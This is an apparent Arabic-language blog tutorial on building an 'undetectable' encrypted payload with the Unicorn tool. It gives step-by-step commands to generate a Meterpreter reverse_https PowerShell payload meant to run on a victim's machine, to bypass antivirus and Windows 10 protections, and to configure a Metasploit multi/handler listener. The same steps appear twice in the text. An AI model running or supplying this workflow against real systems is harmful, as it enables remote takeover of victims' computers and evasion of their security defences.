عمل بايلود مشفر غير قابل للكشف
ماهي أداة Unicorn ؟
تم إنشاؤها بواسطة TrustedSec
, هي أداة بسيطة مصممة للمساعدة في اختبار الاختراق وعمل هجمات
powershell وحقن البايلود shellcode الذي ينشىئ أتصال بينك وبين الضحية
يعرف بكود برمجي يستخدم كبايلود مباشرة في الذاكرة
سنتعرف علي كيفية انشاء بايلود مشفر باستخدام أداة Unicorn وتخطي جميع الحمايات وأيضا تخطي حمايات وندوز 10 باخر اصداراته
git clone https://github.com/trustedsec/unicorn
بعد تحميل الاداة اذهب الى المسار
cd unicorn
او المكان الذي تم تحميل الأداه فيه
لأظهار الخيارات والاوصاف لكل هجوم استخدم الامر التالي
unicorn.py --help/.
unicorn.py windows/meterpreter/reverse_https "your ip" "port/.
ستستخدم الااداة unicorn ميتاسبليوت موديل reverse_https للهجوم
عند توليد البايلود سوف يظهر ملفين الاول powershell_attack.txt والذي سوف يتم تنفيذه بجهاز الضحية والملف الثاني unicorn.rc وهو يحتوي على الاعدادات التي سوف يتم ادخالها في الميتاسبلويت
بعد تشغيل الاداة ادخل الاوامر التالية
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST your ip
set LPORT 4444
set ExitOnSession false
set EnableStageEncoding true
exploit
سنتعرف علي كيفية انشاء بايلود مشفر باستخدام أداة Unicorn وتخطي جميع الحمايات وأيضا تخطي حمايات وندوز 10 باخر اصداراته
الخطوة الأولى :-
تحميل أداة unicorn بأستخدام امرgit clone https://github.com/trustedsec/unicorn
بعد تحميل الاداة اذهب الى المسار
cd unicorn
او المكان الذي تم تحميل الأداه فيه
لأظهار الخيارات والاوصاف لكل هجوم استخدم الامر التالي
unicorn.py --help/.
الخطوة الثانية :-
لتكوين البايلود أستخدم الامر التالي :unicorn.py windows/meterpreter/reverse_https "your ip" "port/.
ستستخدم الااداة unicorn ميتاسبليوت موديل reverse_https للهجوم
عند توليد البايلود سوف يظهر ملفين الاول powershell_attack.txt والذي سوف يتم تنفيذه بجهاز الضحية والملف الثاني unicorn.rc وهو يحتوي على الاعدادات التي سوف يتم ادخالها في الميتاسبلويت
الخطوة الثالثة :-
تشغيل ميتاسبلويت بكتابة الامر msfconsoleبعد تشغيل الاداة ادخل الاوامر التالية
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST your ip
set LPORT 4444
set ExitOnSession false
set EnableStageEncoding true
exploit
إرسال تعليق